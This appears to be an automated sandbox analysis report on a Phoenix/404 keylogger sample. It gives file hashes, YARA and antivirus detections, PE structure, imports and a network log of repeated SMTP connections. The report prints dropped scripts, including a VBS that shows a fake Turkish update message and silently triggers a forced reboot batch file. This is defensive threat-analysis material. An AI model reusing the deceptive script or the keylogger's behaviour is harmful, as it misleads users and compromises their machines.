                                                      Category:dropped
                                                      Size (bytes):318464
                                                      Entropy (8bit):5.369996376760485
                                                      Encrypted:false
                                                      SSDEEP:3072:i+NLboE6nNvN4vkgBotfobUR+7wdzjcGekZDh0iFT2:ioANvN4vPblgcrkT0S
                                                      MD5:9FBC8CDC78C518EBF6774752EC178B13
                                                      SHA1:8093961DCF69E6DEB7867CB1D3FA5B6048B3C7D3
                                                      SHA-256:F523C67C26E042F966A9C394D84E8B3D29EE6C5AF00A5F1D0392CF32AF373DD2
                                                      SHA-512:C7BFB13497D23ED80313E28609EADB1479B5B5D1CBA336E89C1D092BE7AFAFF3715B96328324827B2E685036396CE009C17223EA2DBD095DFD9456BEB33EC073
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: C:\Users\Public\Downloads\systems.exe, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: C:\Users\Public\Downloads\systems.exe, Author: ditekSHen
                                                      • Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: C:\Users\Public\Downloads\systems.exe, Author: ditekSHen
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 89%
                                                      Joe Sandbox View:
                                                      • Filename: GUxrs12a5c.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iC.a................................. ........@.. .......................@............@.................................t...W........*................... ....................................................... ............... ..H............text....... ...................... ..`.rsrc....*.......,..................@..@.reloc....... ......................@..B........................H.......P...$.......#.....................................................(....*..(....*.s.........s.........s.........s.........*..()...*..(+...r...p(,...o-....o\...({...(*...*6~.....o|...&*.se........~.......(...sV...o`...~.......)...sV...ob...(s...*V.(......}$.....}%...*b..{*....(....t....}*...*b..{*....(....t....}*...*b..{+....(....t....}+...*b..{+....(....t....}+...*N.{'...(_...&.(....*6..(k....<...*"..}Y...*"..}Z...*"..}[...*"..}\...*"..}]...*"..}^...*"..}_...*"..}`...*

                                                      C:\Users\Public\Downloads\vbs.bat

                                                      Download File
                                                      Process:C:\Users\user\Desktop\2cB42TzofC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):19
                                                      Entropy (8bit):3.7871439606981414
                                                      Encrypted:false
                                                      SSDEEP:3:FCRBFsI0:FCR8r
                                                      MD5:8D3D89F8660B4BB3FB339512D7006368
                                                      SHA1:0B5B6146BA0538CFDD76E91DF4807A1E3B37C84B
                                                      SHA-256:AB37B2A7E10F9A047E24DC0211B2DD3963B9506E2C120373E06C0D885EA7AB8B
                                                      SHA-512:7E2C7B557591F8EB0864942B589461F9D60C3DEB8C528F85BA41DDC1DB34A4265BA980ABCB880C1D7BF765A73A5FD8F92132A513B9A8C8FE988B2A1DB1E1EAD3
                                                      Malicious:false
                                                      Preview:..shutdown -r -t 50

                                                      C:\Users\Public\Downloads\vbs.vbs

                                                      Download File
                                                      Process:C:\Users\user\Desktop\2cB42TzofC.exe
                                                      File Type:ISO-8859 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):211
                                                      Entropy (8bit):4.998530351202774
                                                      Encrypted:false
                                                      SSDEEP:3:DF6ayAJAFx7JrEWlpR9mWKXTOCqMIBEcAByWKaovVPFEm8nh3QANX4ENHGeDcNU3:Z6XL7DpR9mW6j6W9qNqhvXpfYNUqOUG
                                                      MD5:703060FFD10943FCC7F9C0EEDE5D114A
                                                      SHA1:5FCD96F61AF1D1325A8270B229A182F38F573952
                                                      SHA-256:309CAD9F3BE025CC5CC1A62D6EA6E6072BD307A9E9AF4AB8DDAF7F7ED6F81E03
                                                      SHA-512:74530DA055F7C386EFB98E36FC52553C1D0E3F33031AF8FB87C4DED84F3475BF0C983ED044DDEFEE1020384020F6C848249CD1A238B97567845BCBB4A8371953
                                                      Malicious:true
                                                      Preview:x=msgbox("G.ncelleme Tamamlanmasi i.in Yeniden baslatilacak", 1+32, "Simdi yeniden baslat")....Set WshShell = CreateObject("WScript.Shell")..WshShell.Run chr(34) & "vbs.bat" & Chr(34), 0..Set WshShell = Nothing

                                                      C:\Users\user\Documents\Debug2.txt

                                                      Download File
                                                      Process:C:\Users\Public\Downloads\systems.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):370
                                                      Entropy (8bit):4.479116977578787
                                                      Encrypted:false
                                                      SSDEEP:6:tmhfQzcP3zoMG+30qM4ozwi5WyICKoMG+30qM4on/wi5WyIC2zthoMG+30qM4ozO:tm/VG+30lEAWy1gG+30ln4AWy12pzG+b
                                                      MD5:4C54E1A2148C5AC6C84D300E70FCFD5F
                                                      SHA1:9CC132BCD2BF6443B8683998CA3FF6F534056C5C
                                                      SHA-256:35A0279A1030AFF8904A8907849DD31A060DDAD18F110E3D2907BA0094EAD8CA
                                                      SHA-512:60BA5B892B295B338571980B97C5A160B483D107280363CB68B0D66BC22EE2B3E5F3F34C232BBC89B9EA8EB34F1ACACD10D52D4A4C94BCB4022BA665374CFBE0
                                                      Malicious:false
                                                      Preview:...[ -- Program Manager -- ].....[ -- File Explorer -- ].....[ -- Microsoft .NET Framework -- ].....[ -- Replace or Skip Files -- ].....[ -- Microsoft .NET Framework -- ]......[ -- Replace or Skip Files -- ].......[ -- Microsoft .NET Framework -- ].....[ -- Replace or Skip Files -- ]........[ -- Microsoft .NET Framework -- ].....[ -- Replace or Skip Files -- ]......

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.095464958378066
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:2cB42TzofC.exe
                                                      File size:619950
                                                      MD5:f47ddf38902e6e745ae49168bc55c0fc
                                                      SHA1:e7cc7bd70b128d63ef1e54345d6b97d8fd02ffb8
                                                      SHA256:0d2ada23e3ed12fff4c0e31377f1f577bcca7694b73545049a36f443d6c83215
                                                      SHA512:2736ffcd537bbc2c404a4cc4dc6257f4315b04ee1da80d6a49711f6e509d9e109302961c9679199c5789bfb82f3ef384e5f22daf63fd2f485a015d6eff37ad7d
                                                      SSDEEP:12288:AzxzTDWikLSb4NS7Yb7R0+5aUfFQ91YkXvGRB7MqiZ:2DWHSb4N1s9Wf3CZ
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'..

                                                      File Icon

                                                      Icon Hash:f0f8e060e2f2f871

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x41eef0
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x60C329FF [Fri Jun 11 09:16:47 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F426CB44979h
                                                      jmp 00007F426CB4439Dh
                                                      cmp ecx, dword ptr [0043E668h]
                                                      jne 00007F426CB44515h
                                                      ret
                                                      jmp 00007F426CB44AFEh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007F426CB37317h
                                                      mov dword ptr [esi], 00435580h
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 00435588h
                                                      mov dword ptr [ecx], 00435580h
                                                      ret
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      lea eax, dword ptr [ecx+04h]
                                                      mov dword ptr [ecx], 00435568h
                                                      push eax
                                                      call 00007F426CB4769Dh
                                                      pop ecx
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      sub esp, 0Ch
                                                      lea ecx, dword ptr [ebp-0Ch]
                                                      call 00007F426CB372AEh
                                                      push 0043B704h
                                                      lea eax, dword ptr [ebp-0Ch]
                                                      push eax
                                                      call 00007F426CB46E60h
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      sub esp, 0Ch
                                                      lea ecx, dword ptr [ebp-0Ch]
                                                      call 00007F426CB444B4h
                                                      push 0043B91Ch
                                                      lea eax, dword ptr [ebp-0Ch]
                                                      push eax
                                                      call 00007F426CB46E43h
                                                      int3
                                                      jmp 00007F426CB48E13h
                                                      jmp dword ptr [00433260h]
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push 00422150h
                                                      push dword ptr fs:[00000000h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [EXP] VS2015 UPD3.1 build 24215
                                                      • [LNK] VS2015 UPD3.1 build 24215
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [C++] VS2015 UPD3.1 build 24215
                                                      • [RES] VS2015 UPD3 build 24213

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8300x34.rdata
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8640x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x3bda4.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9f0000x227c.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x313ba0x31400False0.58401411802data6.70980787224IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rdata0x330000xa6220xa800False0.453171502976data5.22267761433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x3e0000x237280x1000False0.36767578125data3.70881866699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .didat0x620000x18c0x200False0.447265625data3.35543418823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x630000x3bda40x3be00False0.681567229906data6.82606167312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x9f0000x227c0x2400False0.775716145833data6.56417662198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      PNG0x636a40xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                      PNG0x641ec0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                      RT_ICON0x657980xfab2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                      RT_ICON0x7524c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 1790208, next used block 1790208
                                                      RT_ICON0x85a740x94a8data
                                                      RT_ICON0x8ef1c0x5488data
                                                      RT_ICON0x943a40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 12648447, next used block 4294902528
                                                      RT_ICON0x985cc0x25a8data
                                                      RT_ICON0x9ab740x10a8data
                                                      RT_ICON0x9bc1c0x988data
                                                      RT_ICON0x9c5a40x468GLS_BINARY_LSB_FIRST
                                                      RT_DIALOG0x9ca0c0x286dataEnglishUnited States
                                                      RT_DIALOG0x9cc940x13adataEnglishUnited States
                                                      RT_DIALOG0x9cdd00xecdataEnglishUnited States
                                                      RT_DIALOG0x9cebc0x12edataEnglishUnited States
                                                      RT_DIALOG0x9cfec0x338dataEnglishUnited States
                                                      RT_DIALOG0x9d3240x252dataEnglishUnited States
                                                      RT_STRING0x9d5780x1e2dataEnglishUnited States
                                                      RT_STRING0x9d75c0x1ccdataEnglishUnited States
                                                      RT_STRING0x9d9280x1b8dataEnglishUnited States
                                                      RT_STRING0x9dae00x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                                                      RT_STRING0x9dc280x446dataEnglishUnited States
                                                      RT_STRING0x9e0700x166dataEnglishUnited States
                                                      RT_STRING0x9e1d80x152dataEnglishUnited States
                                                      RT_STRING0x9e32c0x10adataEnglishUnited States
                                                      RT_STRING0x9e4380xbcdataEnglishUnited States
                                                      RT_STRING0x9e4f40xd6dataEnglishUnited States
                                                      RT_GROUP_ICON0x9e5cc0x84data
                                                      RT_MANIFEST0x9e6500x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                      gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Feb 3, 2022 08:58:42.261951923 CET4971780192.168.2.334.117.59.81
                                                      Feb 3, 2022 08:58:42.278584003 CET804971734.117.59.81192.168.2.3
                                                      Feb 3, 2022 08:58:42.278753042 CET4971780192.168.2.334.117.59.81
                                                      Feb 3, 2022 08:58:42.280294895 CET4971780192.168.2.334.117.59.81
                                                      Feb 3, 2022 08:58:42.296731949 CET804971734.117.59.81192.168.2.3
                                                      Feb 3, 2022 08:58:42.407066107 CET804971734.117.59.81192.168.2.3
                                                      Feb 3, 2022 08:58:42.448391914 CET4971780192.168.2.334.117.59.81
                                                      Feb 3, 2022 08:58:56.651091099 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:56.677782059 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:56.677964926 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:56.719193935 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:56.719634056 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:56.746346951 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:56.748927116 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:56.749232054 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:56.776585102 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:56.840231895 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.022059917 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.048991919 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.049036980 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.049058914 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.049076080 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.049169064 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.056896925 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.083848953 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.203907967 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.230843067 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.241264105 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.268345118 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.269228935 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.300924063 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.545227051 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.545706987 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.572232008 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.572668076 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.573082924 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.599936008 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.600306988 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.631805897 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.864923000 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.867536068 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.867966890 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.868200064 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.869036913 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.869482040 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.869658947 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.869802952 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.869956970 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:58:57.893950939 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.894213915 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.894426107 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.895247936 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.895667076 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.895859957 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.896171093 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:57.896194935 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:58.614145041 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:58:58.731055021 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.494257927 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.520801067 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.521430016 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.521452904 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.521508932 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.549921036 CET49718587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.576503992 CET58749718108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.629116058 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.655488968 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.658173084 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.687567949 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.691104889 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.717379093 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.720290899 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.720954895 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.747639894 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.748471975 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.775401115 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.777888060 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.778240919 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.804852009 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.805002928 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.805464029 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.832034111 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:00.833126068 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:00.864794016 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.067039967 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.067411900 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.093626976 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.093921900 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.102014065 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.128715992 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.129194975 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.161139011 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.336904049 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.352360964 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.352561951 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.352792025 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.352973938 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.353414059 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.353584051 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.353723049 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.353868008 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:01.378720999 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.378747940 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.378974915 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.379117012 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.379538059 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.379698038 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.379861116 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.379961967 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:01.891460896 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.012542963 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.079667091 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.106085062 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.106142998 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.106158018 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.106276989 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.106849909 CET49721587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.133122921 CET58749721108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.193798065 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.220185995 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.220325947 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.247893095 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.248238087 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.274663925 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.277266026 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.280819893 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.308052063 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.335721970 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.363195896 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.366323948 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.369324923 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.396265984 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.396321058 CET58749722108.177.127.108192.168.2.3
                                                      Feb 3, 2022 08:59:02.396712065 CET49722587192.168.2.3108.177.127.108
                                                      Feb 3, 2022 08:59:02.423446894 CET58749722108.177.127.108192.168.2.3
